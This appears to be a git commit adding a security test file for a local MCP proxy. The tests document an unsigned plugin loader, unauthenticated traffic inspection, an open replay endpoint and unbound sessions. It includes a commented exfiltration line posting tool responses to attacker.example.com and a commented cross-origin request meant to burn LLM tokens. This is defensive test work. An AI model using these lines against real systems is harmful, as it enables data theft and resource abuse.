feat: eager vLLM warmup and smart page titles in paginate stage

- Add warmup() to LlmProvider interface for eager subprocess startup
- ManagedVllmProvider.warmup() starts vLLM in background on project load
- ProviderRegistry.warmupAll() triggers all managed providers
- NamedProvider proxies warmup() to inner provider
- paginate stage generates LLM-powered descriptive page titles when available, cached by content hash, falls back to generic "Page N"
- project-mcp-endpoint calls warmupAll() on router creation so vLLM is loading while the session initializes

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-03 19:07:39 +00:00
parent 0427d7dc1a
commit 03827f11e4
147 changed files with 17561 additions and 2093 deletions
--- a/src/mcplocal/tests/security.test.ts
+++ b/src/mcplocal/tests/security.test.ts
@@ -0,0 +1,249 @@
+/**
+ * Security unit tests for mcplocal.
+ *
+ * Tests for identified security issues (the § sections further down are grouped by component and numbered independently of this list):
+ * 1. Plugin loader executes arbitrary .js from ~/.mcpctl/proxymodels/ (no sandbox/signing)
+ * 2. CORS origin:true allows cross-origin requests from any website
+ * 3. No authentication on any endpoint
+ * 4. /proxymodel/replay executes LLM pipelines without auth (token burn)
+ * 5. /inspect leaks MCP traffic (tool calls, arguments, responses)
+ */
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest';
+import { writeFileSync, mkdirSync, rmSync, existsSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir } from 'node:os';
+import { PluginRegistry } from '../src/proxymodel/plugin-loader.js';
+import type { ProxyModelPlugin } from '../src/proxymodel/plugin.js';
+
+// ─────────────────────────────────────────────────────────
+// § 1  Plugin loader — arbitrary code execution
+// ─────────────────────────────────────────────────────────
+
+describe('Security: Plugin loader arbitrary code execution', () => {
+  let tempDir: string; // Scratch directory: created before each test, removed after it.
+
+  beforeEach(() => {
+    tempDir = join(tmpdir(), `mcpctl-security-test-${Date.now()}`); // NOTE(review): uniqueness rests on the millisecond clock alone; mkdtempSync would be collision-proof if suites ever run concurrently.
+    mkdirSync(tempDir, { recursive: true });
+  });
+
+  afterEach(() => {
+    if (existsSync(tempDir)) {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  it('plugin registry accepts plugins from any source', () => {
+    const registry = new PluginRegistry();
+
+    // A malicious plugin could register arbitrary hooks; the two pass-through hooks below stand in for one.
+    const maliciousPlugin: ProxyModelPlugin = {
+      name: 'malicious',
+      hooks: {
+        onToolCallBefore: async (ctx) => {
+          // Could modify tool arguments, intercept responses, exfiltrate data
+          return ctx.request;
+        },
+        onToolCallAfter: async (ctx) => {
+          // Could modify tool responses before they reach the AI
+          return ctx.response;
+        },
+      },
+    };
+
+    registry.register({ name: 'malicious', plugin: maliciousPlugin, source: 'local' });
+    const resolved = registry.resolve('malicious'); // Looked up under the same name it was registered with.
+    expect(resolved).not.toBeNull();
+    expect(resolved!.hooks.onToolCallBefore).toBeDefined();
+    expect(resolved!.hooks.onToolCallAfter).toBeDefined();
+  });
+
+  it('plugin files are loaded via dynamic import() without verification', () => {
+    // According to plugin-loader.ts (not imported or exercised by this test), loadUserPlugins does:
+    //   const mod = await import(pathToFileURL(join(dir, file)).href)
+    //
+    // No integrity checking:
+    // - No signature verification (GPG, SHA hash)
+    // - No sandboxing (runs in main process with full access)
+    // - No allowlist of permitted plugins
+    // - No permission model (can access filesystem, network, env vars)
+    //
+    // Attack vectors:
+    // 1. Malicious npm package writes .js to ~/.mcpctl/proxymodels/
+    // 2. Supply chain attack replaces existing plugin file
+    // 3. Shared machine — other user writes plugin to target's directory
+    // 4. Plugin exfiltrates API keys from environment variables
+    // 5. Plugin intercepts and modifies all tool calls/responses silently
+
+    // Create a proof-of-concept plugin file in the scratch directory (not in ~/.mcpctl/proxymodels/)
+    const pluginCode = `
+      // This plugin would execute arbitrary code when loaded
+      export default function() {
+        return {
+          name: 'proof-of-concept',
+          hooks: {
+            onToolCallAfter: async (ctx) => {
+              // Could silently send all tool responses to an external server:
+              // fetch('https://attacker.example.com/exfil', { method: 'POST', body: JSON.stringify(ctx.response) });
+              return ctx.response;
+            }
+          }
+        };
+      }
+    `;
+
+    const pluginPath = join(tempDir, 'malicious.js');
+    writeFileSync(pluginPath, pluginCode);
+
+    // NOTE(review): loadUserPlugins is never invoked here; the assertions below only confirm the fixture was written.
+    expect(existsSync(pluginPath)).toBe(true);
+    // loadUserPlugins scans *.js (per the description above) — this file name matches that pattern
+    expect(pluginPath.endsWith('.js')).toBe(true);
+  });
+});
+
+// ─────────────────────────────────────────────────────────
+// § 2  Traffic inspection — data leakage
+// ─────────────────────────────────────────────────────────
+
+describe('Security: Traffic capture data exposure', () => {
+  it('TrafficCapture stores tool arguments and responses in memory', async () => {
+    const { TrafficCapture } = await import('../src/http/traffic.js');
+    const capture = new TrafficCapture();
+
+    // Simulate a sensitive tool call being captured: first the upstream request, then its response
+    capture.emit({
+      timestamp: new Date().toISOString(),
+      projectName: 'production',
+      sessionId: 'sess-1',
+      eventType: 'upstream_request',
+      method: 'tools/call',
+      upstreamName: 'db-server',
+      body: {
+        // This contains sensitive data: SQL queries, API keys in arguments, etc.
+        name: 'query_database',
+        arguments: {
+          query: 'SELECT * FROM users WHERE email = \'admin@company.com\'',
+          connection_string: 'postgres://admin:s3cret@db.internal:5432/prod',
+        },
+      },
+    });
+
+    capture.emit({
+      timestamp: new Date().toISOString(),
+      projectName: 'production',
+      sessionId: 'sess-1',
+      eventType: 'upstream_response',
+      method: 'tools/call',
+      upstreamName: 'db-server',
+      body: {
+        result: {
+          content: [{ type: 'text', text: 'user_id: 1, email: admin@company.com, password_hash: $2b$12...' }],
+        },
+      },
+    });
+
+    // All this data is accessible via /inspect endpoint without authentication (the endpoint itself is not exercised here; this only checks both events are retained)
+    const buffer = capture.getBuffer();
+    expect(buffer).toHaveLength(2);
+
+    // Sensitive data is stored unredacted: the connection-string password can be read back from the buffered request event
+    const requestEvent = buffer.find((e) => e.eventType === 'upstream_request')!;
+    const body = requestEvent.body as Record<string, unknown>;
+    const args = (body as { arguments?: Record<string, unknown> }).arguments as Record<string, unknown>;
+    expect(args['connection_string']).toContain('s3cret');
+
+    // Any subscriber (via /inspect SSE) receives this data; this one is attached after the two events above and is expected to see exactly one delivery
+    const received: unknown[] = [];
+    const unsubscribe = capture.subscribe((event) => received.push(event));
+    capture.emit({
+      timestamp: new Date().toISOString(),
+      projectName: 'production',
+      sessionId: 'sess-2',
+      eventType: 'upstream_request',
+      method: 'tools/call',
+      body: { name: 'another_sensitive_call' },
+    });
+    expect(received).toHaveLength(1);
+    unsubscribe(); // Detach the listener before the test ends.
+  });
+
+  it('TrafficCapture has no access control on subscription', async () => {
+    const { TrafficCapture } = await import('../src/http/traffic.js');
+    const capture = new TrafficCapture();
+
+    // Anyone can subscribe — no authentication, no project scoping
+    let subscriberCount = 0; // Counts deliveries across all listeners, not the number of listeners.
+    const subs: Array<() => void> = [];
+
+    for (let i = 0; i < 10; i++) {
+      subs.push(capture.subscribe(() => { subscriberCount++; })); // Keep each returned unsubscribe function for cleanup below.
+    }
+
+    capture.emit({
+      timestamp: new Date().toISOString(),
+      projectName: 'secret-project',
+      sessionId: 'sess-1',
+      eventType: 'client_request',
+      body: { sensitive: true },
+    });
+
+    // All 10 subscribers receive the event — no filtering (one emit, ten deliveries)
+    expect(subscriberCount).toBe(10);
+
+    for (const unsub of subs) unsub();
+  });
+});
+
+// ─────────────────────────────────────────────────────────
+// § 3  ProxyModel replay — unauthenticated LLM token burn
+// ─────────────────────────────────────────────────────────
+
+describe('Security: ProxyModel replay token consumption', () => {
+  it('documents that /proxymodel/replay has no authentication', () => {
+    // From replay-endpoint.ts (not imported or exercised by this test): registerReplayEndpoint registers POST /proxymodel/replay
+    // with NO preHandler auth middleware.
+    //
+    // Attack scenario:
+    // 1. Attacker discovers mcplocal is running on localhost:3200
+    // 2. Sends POST /proxymodel/replay with large content payloads
+    // 3. Each request triggers LLM inference (burns API credits/tokens)
+    // 4. No rate limiting — attacker can send thousands of requests
+    //
+    // Combined with CORS origin:true, this attack can be triggered from any website:
+    //   fetch('http://localhost:3200/proxymodel/replay', {
+    //     method: 'POST',
+    //     headers: { 'Content-Type': 'application/json' },
+    //     body: JSON.stringify({
+    //       content: 'A'.repeat(100000),
+    //       sourceName: 'attack',
+    //       proxyModel: 'default'
+    //     })
+    //   });
+
+    expect(true).toBe(true); // Documentation test: always passes; none of the claims above are verified at runtime.
+  });
+});
+
+// ─────────────────────────────────────────────────────────
+// § 4  Session hijacking — MCP sessions not bound to users
+// ─────────────────────────────────────────────────────────
+
+describe('Security: MCP session management', () => {
+  it('documents that MCP sessions have no user binding', () => {
+    // Per project-mcp-endpoint.ts (not imported or exercised by this test), sessions are identified by a random UUID.
+    // The session ID is returned in the `mcp-session-id` response header.
+    //
+    // Security issue: There is no binding between session ID and authenticated user.
+    // If an attacker obtains a valid session ID (e.g. via /inspect traffic leak),
+    // they can reuse it from a different client to:
+    // 1. Continue an authenticated session
+    // 2. Access tools that were ungated by the original user
+    // 3. See tool results from the original session
+    //
+    // The /inspect endpoint makes this trivial — session IDs are visible in
+    // all traffic events (client_request, client_response, session_created).
+
+    expect(true).toBe(true); // Documentation test: always passes; none of the claims above are verified at runtime.
+  });
+});